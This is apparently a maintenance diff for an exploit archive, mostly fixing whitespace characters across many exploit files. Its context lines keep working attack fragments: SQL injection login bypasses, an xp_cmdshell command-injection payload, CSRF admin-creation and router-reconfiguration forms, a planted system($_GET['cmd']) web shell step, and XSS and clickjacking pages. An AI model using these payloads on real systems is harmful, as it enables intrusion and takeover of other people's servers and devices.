DB: 2021-08-20

204 changes to exploits/shellcodes

Charity Management System CMS 1.0 - Multiple Vulnerabilities

exploits/aix/dos/35342.txt

@@ -43,7 +43,7 @@ function updateDataBase($robot, $nom, $actif, $user_agent, $ip1, $ip2, $detectio
   global $RS_LANG, $RS_LANGUE, $RS_TABLE_ROBOTS, $RS_DETECTION_USER_AGENT, $RS_DETECTION_IP;
 
   // dans tous les cas :
-  echo "<p class='normal'><a class='erreur'> ";
+  echo "<p class='normal'><a class='erreur'> ";
   $msg = "";
 
   // test du nom

exploits/aix/webapps/11580.txt

@@ -54,8 +54,8 @@ Add/Edit Admin CSRF:
 <td><input type='checkbox' name='uload' value='1'>Upload</td>			<td><input type='checkbox' name='rename' value='1'>Rename</td>
 <td><input type='checkbox' name='delete' value='1'>Delete</td>		<td><input type='checkbox' name='edit' value='1'>Edit</td>
 <td><input type='checkbox' name='dload' value='1'>Download</td>		<td><input type='checkbox' name='chmod' value='1'>Chmod</td>
-<td><input type='checkbox' name='move' value='1'>Move</td>			<td> </td></tr>
+<td><input type='checkbox' name='move' value='1'>Move</td>			<td> </td></tr>
-<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
+<td colspan='2'><input type='submit' value='Add User' name='sub'> <input type='button' value='Cancel' onclick='top.location="index.php"'></td>
 </form>
 </body>
 </html>

exploits/aix/webapps/14058.html

@@ -69,12 +69,12 @@ http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connecto
 
 </td>
 <td>
-   </td>
+   </td>
 <td>
 Current Folder<br />
 <input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
 <td>
-   </td>
+   </td>
 
 <td>
 Resource Type<br />
@@ -96,16 +96,16 @@ Resource Type<br />
 <td valign="top">
 <a href="#" onclick="GetFolders();">Get Folders</a></td>
 <td>
-   </td>
+   </td>
 <td valign="top">
 <a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
 <td>
-   </td>
+   </td>
 
 <td valign="top">
 <a href="#" onclick="CreateFolder();">Create Folder</a></td>
 <td>
-   </td>
+   </td>
 <td valign="top">
 <form id="frmUpload" action="" target="eRunningFrame" method="post"
 enctype="multipart/form-data">

exploits/asp/webapps/11295.txt

@@ -11,7 +11,7 @@ Arbitrary File Upload
 <form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data "> 
 <p align="center"> 
 <input type=file name=uploadfile size=100><br> <br> 
-<input type=submit value=Upload>  </p>
+<input type=submit value=Upload>  </p>
 </form> 
 
 

exploits/asp/webapps/12471.txt

@@ -75,8 +75,8 @@ DEMO : TO change the admin login details and other info..
         <input type=text name=Adminlevel value="Root">
       </td>
     </tr>
-      <td width="168"> </td>
+      <td width="168"> </td>
-      <td width="220"> </td>
+      <td width="220"> </td>
     </tr>
     <tr> 
       <td colspan="2">        

exploits/asp/webapps/13891.html

@@ -22,8 +22,8 @@ Sex
 </select>
 </p>
 <p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
-<p> </p>
+<p> </p>
-<p> </p>
+<p> </p>
 
 </form>
 </frewal>

exploits/asp/webapps/17015.txt

@@ -7,7 +7,7 @@
 # Software Link: http://www.element-it.com/downloadfile.aspx?type=pow
 # Demo:
 http://site.com/Examples/PowUpload/Simpleupload.htm
- 
+ 
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
 Login-Root, KikoArg, Ricota,

exploits/asp/webapps/17016.txt

@@ -6,7 +6,7 @@
 # Software: EAFlashUpload v 2.5
 # Software Link: http://www.easyalgo.com/downloads.aspx#EAFlashUpload
 # Demo: http://www.site.com/examples/eaflashupload/simpleupload.aspx
- 
+ 
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Inyexion,
 Login-Root, KikoArg, Ricota,

exploits/asp/webapps/3493.txt

@@ -194,16 +194,16 @@ MSSQL CMD Injection Exploit(For DBO Users) :
   <tr>
     <center><img src="http://img382.imageshack.us/img382/7867/dirav8.jpg"></center><br>
     <center><td align="right"><font face="Arial" size="1" color="#00FF00">Command Exec :</td>
-    <td> </td>
+    <td> </td>
     <td><input name="action=viewimage&categoryid=-1" type="text" value=";exec master..xp_cmdshell 'dir c:\ > cmd.txt';CREATE TABLE cmd (txt varchar(8000));BULK INSERT cmd FROM 'cmd.txt';exec+sp_makewebtask+'ftp://127.0.0.1/public/file.txt','select+*+from+cmd';--" class="inputbox" style="color: #000000" style="width:300px; "></td>
   </tr>
   <tr>
     <td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td>
-    <td> </td>
+    <td> </td>
     <td>
       <select name="">
         <option value="0">(CMD)</option>
-      </select> <br><br>
+      </select> <br><br>
       <input type="submit" value="Apply"></center>
     </td>
   </tr>

exploits/asp/webapps/7277.txt

@@ -1,4 +1,4 @@
-[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
+[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
 Â [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
 Â  Â 
 Â [~]Vendor: www.activewebsoftwares.com
@@ -30,7 +30,7 @@
 Â 
 Â  [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
 Â  [~]
-  [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
+  [~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
 Â  [~]
 Â  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
 Â  [~]

exploits/asp/webapps/7423.txt

@@ -4,25 +4,25 @@
    
  [~] Vendor: www.adserversolutions.com
    
- [☠] Software: Affiliate Software Java 4.0
+ [☠] Software: Affiliate Software Java 4.0
    
- [☠] author: ((я3d D3v!L))
+ [☠] author: ((я3d D3v!L))
    
- [☠] Date: 12.12.2008
+ [☠] Date: 12.12.2008
 
- [☠] Home: www.ahacker.biz
+ [☠] Home: www.ahacker.biz
    
- [☠] contact: N/A
+ [☠] contact: N/A
 
-[☠]  ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+[☠]  ☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
    
- [☠] Exploit:
+ [☠] Exploit:
    
- ☠ username: r0' or ' 1=1--
+ ☠ username: r0' or ' 1=1--
- ☠ password: r0' or ' 1=1--
+ ☠ password: r0' or ' 1=1--
    
    
- [☠]login 4 d3m0:
+ [☠]login 4 d3m0:
    
   http://www.adserversolutions.com/affiliate_java/logon.jsp
  

exploits/asp/webapps/7424.txt

@@ -14,7 +14,7 @@
    
  [~] contact: N/A
 
-[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
    
  [~] Exploit:
    
@@ -22,7 +22,7 @@
  [~] password: r0' or ' 1=1--
    
    
- [☠] login 4 d3m0:
+ [☠] login 4 d3m0:
    
   www.adserversolutions.com/admgmt_460/logon.jsp
  

exploits/asp/webapps/7425.txt

@@ -14,7 +14,7 @@
    
  [~] contact: N/A
 
-[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+[~]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{R0}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
    
  [~] Exploit:
    
@@ -22,7 +22,7 @@
  [~] password: r0' or ' 1=1--
    
    
- [☠]login 4 d3m0:
+ [☠]login 4 d3m0:
    
   www.adservingsolutions.com/xchange_java/logon_license.jsp
  

exploits/asp/webapps/9675.txt

@@ -1,42 +1,42 @@
  [☢] ☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢{بسم الله الرحمن الرحيم}☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢☢
-[☠]
+[☠]
 [~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
-[☠]
+[☠]
 [~] Vendor: www.hotwebscripts.co.uk
-[☠]
+[☠]
-[☠] Software: HotWeb Rentals 
+[☠] Software: HotWeb Rentals 
-[☠]
+[☠]
-[☠] author: ((я3d D3v!L))
+[☠] author: ((я3d D3v!L))
-[☠]
+[☠]
-[☠] Date: 15.2.2009
+[☠] Date: 15.2.2009
-[☠]
+[☠]
-[☠] Home: CL053D
+[☠] Home: CL053D
-[☠]
+[☠]
-[☠] contact: X@hotmail.co.jp
+[☠] contact: X@hotmail.co.jp
-[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
+[☠]☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠{DEV!L'5 of SYST3M}☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠☠
 
-[☠] ERR0R CONSOLE
+[☠] ERR0R CONSOLE
 
 WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)
 
-[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L
+[☠]SECURE ALERT FR0M 7h3 R3d-D3V!L
 
-[☠] Exploit:
+[☠] Exploit:
 
-[☠] TRU3 : details.asp?PropId=1+and+1=1
+[☠] TRU3 : details.asp?PropId=1+and+1=1
 
 
- [☠] FALS3 : details.asp?PropId=1+and+1=2
+ [☠] FALS3 : details.asp?PropId=1+and+1=2
 
-[☠]liv3 3xpL0!T:
+[☠]liv3 3xpL0!T:
-[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
+[☠] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
-[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
+[☠] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2
 
 
- [☠]
+ [☠]
 
 N073:
-R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
+R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
 
 4R48!4N-HACK3R!!القراصنه العرب
 
@@ -46,9 +46,9 @@ R34L R3d-D3V!L WAS h3R3 ((☠X@Minhal.co.il☠))
  [~]70 ِALL ARAB!AN HACKER 3X3PT:LAM3RZ
 [~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y  
 
- [☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
+ [☠]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''
 
-[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
+[☠] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007
 
   [~]spechial FR!ND: 74M3M تميم
 

exploits/hardware/dos/11769.py

@@ -36,7 +36,7 @@ def main():
 	</head>
 	<body onLoad="triggerCrash()">
 	<div id="evilDiv">
-	 
+	 
 	</div>
 	</body>
 	</html>

exploits/hardware/local/24899.txt

@@ -14,7 +14,7 @@ The Vigor 3900 is a high-performance quad-Gigabit WAN router for high-performanc
 failover. Its WAN throughput runs at up to 1Gb/s, adequate for the most demanding SME applications. The WAN ports on the Vigor 3900 can provide load balancing
 or WAN failover. Based on a new DrayTek OS platform, the Vigor 3900 combines high performance and capacity with DrayTek's traditional ease of use and comprehensive
 features set.
-########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
+########For multi-tenant or departmental flexibility, the Vigor3900 will support multiple LAN IP subnets, together with VLAN capabilities and user management
 providing access to WAN resources only to the appropriate users or departments, as well as maintaining infrastructure effciency.
 
 ############################Advisory:###################################################

exploits/hardware/webapps/26401.txt

@@ -26,8 +26,8 @@ Exploit:
 <tbody><tr><td class="headerbg">Factory Reset</td></tr>
 </tbody></table>
 <table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
-<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
+<tbody><tr><td height="50" bgcolor="#F0F0F0"> <span class="bluetextbold">Do you want to restore Print Server to factory default setting?</span></td></tr>
-</tbody></table><br> 
+</tbody></table><br> 
 <input name="Factory" value=" Yes " type="submit" width="60">
 </form>
 
@@ -41,7 +41,7 @@ Exploit:
 </tbody></table>
 <table bgcolor="#FFFFFF" border="0" cellpadding="5" cellspacing="1" width="100%">
 <tbody><tr>
- <td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
+ <td class="bluetextbold" align="right" bgcolor="#C5CEDA" valign="top" width="150"> IP Address:</td>
  <td bgcolor="#F0F0F0" valign="top">
  <table border="0">
  <tbody><tr><td>
@@ -49,15 +49,15 @@ Exploit:
   <table border="0" cellpadding="3" cellspacing="0">
   <tbody><tr>
    <td width="20"></td><td>IP Address</td>
-   <td>:  <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
+   <td>:  <input size="18" name="IP_Address" value="192.168.1.110" type="text"></td>
   </tr>
   <tr>
    <td></td><td>Subnet Mask</td>
-   <td>:  <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
+   <td>:  <input size="18" name="Subnet_Mask" value="255.255.255.0" type="text"></td>
   </tr>
   <tr>
    <td></td><td>Default Gateway</td>
-   <td>:  <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
+   <td>:  <input size="18" name="Default_Gateway" value="192.168.1.254" type="text"></td>
   </tr>
   </tbody></table>
 </td></tr>
@@ -68,8 +68,8 @@ Exploit:
 </tbody></table>
 <table border="0" cellpadding="5" cellspacing="1" width="100%">
 <tbody><tr>
- <td height="50" width="149"> </td>
+ <td height="50" width="149"> </td>
- <td width="355"> <input name="Config2" value=" Save " type="submit" width="80">  <input value="Cancel" type="reset" width="80"></td>
+ <td width="355"> <input name="Config2" value=" Save " type="submit" width="80">  <input value="Cancel" type="reset" width="80"></td>
 </tr>
 </tbody></table>
 </form>

exploits/hardware/webapps/32943.txt

@@ -2,11 +2,11 @@
 # Date: 20-04-2014
 # Author: Rakesh S
 # Software Link: http://www.teracom.in/
-# Version:  T2-B-Gawv1.4U10Y-BI
+# Version:  T2-B-Gawv1.4U10Y-BI
 
 The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password.
- 
+ 
 The exploitation example below changes password for the SSID:
- 
+ 
- 
+ 
 <a href="http://[HOST]/webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=1&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=8&essid=SSID&hidessid=off&security=wpa2&encryptionselect=tkip&authmethodselect=psk&wpapp=ChangePassword&pmkcaching=on&confirm=Confirm" target="myIframe">Submit</a>

exploits/hardware/webapps/44935.txt

@@ -1,6 +1,6 @@
 # Exploit Title: DIGISOL DG-BR4000NG - Cross-Site Scripting
 # Date: 2018-06-24
-# Vendor Homepage:  http://www.digisol.com
+# Vendor Homepage:  http://www.digisol.com
 # Hardware Link: https://www.amazon.in/Digisol-DG-BR4000NG-Wireless-Broadband-802-11n/dp/B00A19EHYK
 # Category: Hardware
 # Exploit Author: Adipta Basu
@@ -8,9 +8,9 @@
 # Web: https://hackings8n.blogspot.com
 # Tested on: Mac OS High Sierra
 # CVE: CVE-2018-12705
- 
+ 
 # Reproduction Steps:
- 
+ 
 - Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
 - Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
 - Open BurpSuite

exploits/hardware/webapps/44955.txt

@@ -1,17 +1,17 @@
 # Exploit Title: DIGISOL DG-HR3400 Wireless Router -  Cross-Site Scripting
 # Date: 2018-06-25
-# Vendor Homepage:  http://www.digisol.com
+# Vendor Homepage:  http://www.digisol.com
 # Hardware Link: https://www.amazon.in/Digisol-DG-HR3400-300Mbps-Wireless-Broadband/dp/B00IL8DR6W
 # Category: Hardware
 # Exploit Author: Adipta Basu
 # Tested on: Mac OS High Sierra
 # CVE: N/A
- 
+ 
 # Reproduction Steps:
- 
+ 
-   - Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
+   - Goto your Wifi Router Gateway [i.e: http://192.168.2.1]
-   - Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
+   - Go to --> "General Setup" --> "Wireless" --> "Basic Settings"
-   - Open BurpSuite
+   - Open BurpSuite
    - Change the SSID to "Testing" and hit "Apply"
    - Burp will capture the intercepts.
    - Now change the SSID to <script>alert("ADIPTA")</script> and keep APSSID as it is

exploits/hardware/webapps/45037.txt

@@ -104,7 +104,7 @@ testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.
 testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
 testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0
 roOt:$1$MJOnV/Y3$tDnMIBMy0lEQ2kDpfgTJP0" />
-      <input type="hidden" name="save" value=" Save Changes " />
+      <input type="hidden" name="save" value=" Save Changes " />
       <input type="submit" value="Submit request" />
     </form>
   </body>

exploits/hardware/webapps/45038.txt

@@ -155,7 +155,7 @@ START=90
 ftpd &
 
 " />
-      <input type="hidden" name="save" value=" Save Changes " />
+      <input type="hidden" name="save" value=" Save Changes " />
       <input type="submit" value="Submit request" />
     </form>
   </body>

exploits/ios/dos/37660.txt

@@ -21,7 +21,7 @@ use threads;
 use LWP::UserAgent;
 
 
-print "    Mohammad Reza Espargham\n   www.reza.es\n\n     Syntax: perl poc.pl 192.168.1.3\n\n";
+print "    Mohammad Reza Espargham\n   www.reza.es\n\n     Syntax: perl poc.pl 192.168.1.3\n\n";
 
 
 $port=8080; #port

exploits/ios/webapps/27188.txt

@@ -129,7 +129,7 @@ Add Directory</a>  |  <a id="AllSelect" href="javascript:selectAll()">Select All
   |  <a href="javascript:if(confirm('Are%20you%20sure%20to%20delete?'))delPhoto();" 
 id="del" style="color:#F30;">Delete</a></span>
 <span style="position:absolute; left:10px;">Photos/ ><[PERSISTENT INJECTED SCRIPT CODE VIA ADD DIRECTORY NAME]">/
-    <a href="javascript:window.location.href='..'" 
+    <a href="javascript:window.location.href='..'" 
 style="color:#F60"> <<Up 
 Level</a></span><span id="photoCount"></span>
 

exploits/java/webapps/43733.rb

@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
     'Name'           => 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit',
     'Description'    => %q{
           This module exploits an expression language remote code execution flaw in the Primefaces JSF framework.
-          Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
+          Primefaces versions prior to 5.2.21, 5.3.8 or 6.0 are vulnerable to a padding oracle attack, due to the use of weak crypto and default encryption password and salt.
   },
     'Author'         => [ 'Bjoern Schuette' ],
     'License'        => MSF_LICENSE,

exploits/jsp/remote/18179.html

@@ -2,9 +2,9 @@
 # Date:30/11/2011
 # Author: Alexey Sintsov
 # Software Link: http://www.ibm.com/
-# Version:8.5.3/8.5.2 FP3 (0day) 
+# Version:8.5.3/8.5.2 FP3 (0day) 
 # Tested on: Windows 7 / Windows 2008
-# CVE : CVE-2011-1519
+# CVE : CVE-2011-1519
 
 
 Application: IBM Lotus Domino Controller
@@ -12,7 +12,7 @@ Versions Affected: <=8.5.2 FP3, <=8.5.3
 Manager 4.0 prior to Update 4
 (0day) 
 Vendor URL: http://ibm.com
-Bug: own XML parser  
+Bug: own XML parser  
 CVE: CVE-2011-1519
 CVSS2: 9.0
 Exploits: YES
@@ -23,7 +23,7 @@ Digital Security Research Group [DSecRG] (research [at] dsecrg [dot]com)
 
 This bug was found by Patrik Karlsson and sold to ZDI. IBM make fix for this bug,
 but not enough. So this sploit can make auth. bypass in Lotus Domino Controller even with patch from IBM. So still 0day.
-Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
+Details you can read there: http://dsecrg.com/pages/pub/show.php?id=41
 
 EXPLOIT:
 
@@ -66,8 +66,3 @@ height = "99%"
 </applet>
 </body>
 </html>
-
-
-
-
- 

exploits/jsp/webapps/21545.txt

@@ -4,7 +4,7 @@ CVE-2012-4051 - JAMF Casper Suite MDM CSRF Vulnerability
 # Date: Discovered and reported July 2012
 # Author: Jacob Holcomb/Gimppy042
 # Software JAMF Software Casper Suite (http://jamfsoftware.com/products/casper-suite)
-# CVE : CVE-2012-4051 for the CSRF 
+# CVE : CVE-2012-4051 for the CSRF 
 
 
 <head>

exploits/linux/local/19517.pl

@@ -14,9 +14,9 @@ highlighted remember password.
 Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt,
 Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
 InyeXion, ksha, zerial,LinuxFer, Scorp
-    her0, r0dr1 y demas user de RemoteExecution
+    her0, r0dr1 y demas user de RemoteExecution
-    www.remoteexecution.info www.remoteexcution.com.ar
+    www.remoteexecution.info www.remoteexcution.com.ar
-    #RemoteExecution Hacking Group
+    #RemoteExecution Hacking Group
 
 [PoC]
 

exploits/linux/remote/18145.py

@@ -132,8 +132,8 @@ addr_os = {
     # ID # OS                        # STACK SIZE      # GADGET TABLE
     1  : ["Arch Linux 2010.05    ",  0xb9,             arch_rop_chain], # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
     2  : ["Labs test             ",  0xbf,             labs_rop_chain],
-	-1 : ["Debian 5.0.8 Lenny    ",  -3,               False],			# wireshark_1.0.2-3+lenny12_i386.deb
+	-1 : ["Debian 5.0.8 Lenny    ",  -3,               False],			# wireshark_1.0.2-3+lenny12_i386.deb
-    -2 : ["Debian 6.0.2 Squeeze  ",  -1,               False],			# wireshark_1.2.11-6+squeeze1_i386.deb	
+    -2 : ["Debian 6.0.2 Squeeze  ",  -1,               False],			# wireshark_1.2.11-6+squeeze1_i386.deb	
     -3 : ["Fedora 14             ",  -1,               False],			# wireshark-1.4.3-1.2.2.i586.rpm
     -4 : ["OpenSuse 11.3         ",  -1,               False],			# wireshark-1.4.3-1.2.2.i586.rpm
     -5 : ["Ubuntu 10.10 | 11.04  ",  -1,               False],			# 

exploits/linux/remote/364.pl

@@ -38,7 +38,7 @@ print "Sent\n";
 
 while (<$remote>)
 {
- print $_;
+ print $_;
 }
 print "\n";
 

exploits/linux/webapps/34241.txt

@@ -16,7 +16,7 @@ While logged in as admin user:
 
 3) log in as that user
 
-4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
+4) edit /usr/local/ispconfig/interface/lib/lang/en.lng with system($_GET['cmd']);
 
 
 5) browse to: http://server:8080/index.php?cmd=echo /tmp/script >>/usr/local/ispconfig/server/server.sh

exploits/linux/webapps/49321.py

@@ -2,7 +2,7 @@
 # Date: 12/12/2020
 # Exploit Author: IHTeam
 # Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
-# Vendor Homepage: https://www.terra-master.com/
+# Vendor Homepage: https://www.terra-master.com/
 # Version: <= 4.2.06
 # Tested on: 4.1.30, 4.2.06
 

exploits/multiple/dos/10870.html

@@ -30,9 +30,9 @@ Click on google (look the Status bar) and you'll be redirect on Yahoo<br><strong
 <br>
 <br>
 <br>
-                           <font style="font-family:arial;font-size:32px">Look Here<br>
+                           <font style="font-family:arial;font-size:32px">Look Here<br>
-                   | <br>
+                   | <br>
-                  V
+                  V
 
 <script>
 

exploits/multiple/remote/14386.html

@@ -8,7 +8,7 @@ Opera</font><font face="Calibri" size="6" color="#FF0000">
 <font face="Arial" size="2"><code class="xml plain">
 (V10.60)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
 <b>Clickjacking</b></code></font></p>
-<p align="center"> </p>
+<p align="center"> </p>
 <div class="style1" id="open"
 style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@@ -32,8 +32,8 @@ style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
 <p align="center">
 <font size="1" color="#FFFFFF">ClickJacking</font></div>
-<p align="center"> </p>
+<p align="center"> </p>
-<p align="center"> </p>
+<p align="center"> </p>
 <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
 <p align="center">http://Securitylab.ir/Advisory</p>
 </html>

exploits/multiple/remote/14387.html

@@ -8,7 +8,7 @@ Safari</font><font face="Calibri" size="6" color="#FF0000">
 <font face="Arial" size="2"><code class="xml plain">
 (V4.0.2)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
 <b>Clickjacking</b></code></font></p>
-<p align="center"> </p>
+<p align="center"> </p>
 <div class="style1" id="open"
 style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@@ -33,8 +33,8 @@ onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
 <p align="center">
 <p align="center">
 <font size="1" color="#FFFFFF">ClickJacking</font></div>
-<p align="center"> </p>
+<p align="center"> </p>
-<p align="center"> </p>
+<p align="center"> </p>
 <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
 <p align="center">http://Securitylab.ir/Advisory</p>
 </html>

exploits/multiple/remote/14388.html

@@ -7,7 +7,7 @@
 <font face="Arial" size="2"><code class="xml plain">
 (V9.0.0.6)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
 <b>Clickjacking</b></code></font></p>
-<p align="center"> </p>
+<p align="center"> </p>
 <div class="style1" id="open"
 style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
@@ -31,8 +31,8 @@ style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px
 onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
 <p align="center">
 <font size="1" color="#FFFFFF">ClickJacking</font></div>
-<p align="center"> </p>
+<p align="center"> </p>
-<p align="center"> </p>
+<p align="center"> </p>
 <p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
 <p align="center">http://Securitylab.ir/Advisory</p>
 </html>

exploits/multiple/webapps/11527.html

@@ -11,9 +11,9 @@ Create Database:
 					<td><div id="dbname_error"></div></td>
 				</tr>
 				<tr>
-					<td> </td>
+					<td> </td>
 					<td><center><input type="submit" id="submit_dbname" value="Create Database" class="input-button" /></center></td>
-					<td> </td>
+					<td> </td>
 				</tr>
 			</table>
 		</div>
@@ -36,9 +36,9 @@ Add Redirect:
     			http://<span id="wwwtxt">(www.)?</span><select name="domain" onChange="EnableDisableRadio();">
       			    <option selected value=".*">** All Public Domains **</a>
                 	<option value="siteismi.com">sEc-r1z.com</option></select>  
-			    </select>/ <input name=path type=text size="20" id="urlpath">
+			    </select>/ <input name=path type=text size="20" id="urlpath">
-				 <br />redirects to&#8594; 
+				 <br />redirects to&#8594; 
-				<input id="url" name="url" type="text" size="50">  
+				<input id="url" name="url" type="text" size="50">  
  
                 <br />
 				<noscript>
@@ -66,7 +66,7 @@ Add Redirect:
 			</p>
 		</form></div>
  	<p class="description">
-	 	<strong>Note:</strong><br /><ul><li>Checking the <b>Wild Card Redirect</b> Box will redirect all files within a directory to the same filename in the redirected directory.</li><li> </li><li>You cannot use a Wild Card Redirect to redirect your main domain to a different directory on your site.</li></ul>
+	 	<strong>Note:</strong><br /><ul><li>Checking the <b>Wild Card Redirect</b> Box will redirect all files within a directory to the same filename in the redirected directory.</li><li> </li><li>You cannot use a Wild Card Redirect to redirect your main domain to a different directory on your site.</li></ul>
 		</p>
 	<!-- <br /> -->
 	<h2>Current Redirects</h2>

exploits/multiple/webapps/18431.txt

@@ -6,15 +6,15 @@
 # Software: Ajax Upload
 # http://valums.com/ajax-upload/
 # Tested on: Linux
-  
+  
 [Comment]
 Agradezco a mis amigos: Hernan Jais, Alfonso Cuevas, Lisandro
